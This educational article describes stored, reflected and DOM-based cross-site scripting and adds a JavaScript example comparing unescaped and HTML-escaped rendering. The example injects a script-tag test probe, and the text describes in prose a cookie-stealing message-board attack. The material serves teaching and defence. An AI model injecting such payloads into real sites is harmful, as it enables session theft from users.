Different types of cross-site scripting attacks
Stored (persistent) XSS
Stored or persistent XSS attacks occur when the malicious scripts are permanently stored on the targeted server(s), for example in a database, on a message board, in comment fields, or on other pages that accept user input. Victims receive the malicious script when they request the stored information from the server.
Reflected XSS
A reflected attack occurs when the malicious script is not contained on the server but is included in the input sent to the server. Error messages and search results are two commonly used vectors.
These attacks are often delivered to the target via an email or on another site, often by tricking the target into choosing a link containing the malicious script or by having the user submit a malicious form. The malicious code is then reflected to the user's browser. Because the script arrives in the server's response, the browser treats it as trustworthy and executes it.
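The stored and reflected cases described above, shown from the defender's side as an added example (not code from the original page): each page is rendered once without and once with output encoding. The function names, the in-memory message board and the sample inputs are assumptions constructed for illustration.

```javascript
// Added example: all names and sample inputs here are constructed.

// Encode the characters that let text break out of HTML element content
// or a quoted attribute value.
function escapeHtml(text) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// Reflected case: the search term comes from the request and is echoed
// straight back in the results page.
function renderSearchUnsafe(query) {
  return `<p>No results for ${query}</p>`;
}
function renderSearchSafe(query) {
  return `<p>No results for ${escapeHtml(query)}</p>`;
}

// Stored case: posts are kept as submitted and served to every later visitor.
const board = [];
function savePost(author, body) {
  board.push({ author, body });
}
function renderBoardUnsafe() {
  return board.map((p) => `<li><b>${p.author}</b>: ${p.body}</li>`).join('\n');
}
// Encoding happens at output time, so posts saved before the fix are covered too.
function renderBoardSafe() {
  return board
    .map((p) => `<li><b>${escapeHtml(p.author)}</b>: ${escapeHtml(p.body)}</li>`)
    .join('\n');
}

// True if the rendered HTML still contains a live <script> element.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

const probe = '<script>alert(1)</script>'; // constructed, harmless marker input
savePost('alice', 'Hello board');
savePost('mallory', probe);

console.log('search unsafe:', containsScriptTag(renderSearchUnsafe(probe)));
console.log('search safe:  ', containsScriptTag(renderSearchSafe(probe)));
console.log('board unsafe: ', containsScriptTag(renderBoardUnsafe()));
console.log('board safe:   ', containsScriptTag(renderBoardSafe()));
```

The encoding shown covers HTML element content and quoted attributes only; values placed inside script blocks, URLs or CSS need encoding specific to that context.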
DOM-based attacks
There is a third type of attack, known as a DOM-based attack, which is not common but can occur. The document object model, or DOM, is the application programming interface (API) used for valid HTML and XML documents. A DOM-based attack occurs when the DOM environment is modified in the target's web browser. This modification causes the client-side code to run in unexpected ways.
DOM-based attacks are different in that they do not exploit flaws in the server-side code, relying instead on the client-side scripts.
Cross-site scripting attacks (XSS) examples

Although this example is an old one, it shows the simplicity of executing an XSS attack on a target. The image above shows how an attacker implements a malicious script to extract the user's cookie data, including the user ID and password from the browser. There's also an HTML image tag being used to provide this information to the attacker through a monitor file on his server.

The image above shows a message once it is posted on the message board; because of the malicious script, it gives a user's private cookie data to the attacker. This example is simple and easy to identify as a malicious attack, but there are ways to enhance these attacks and hide the malicious actions from target users.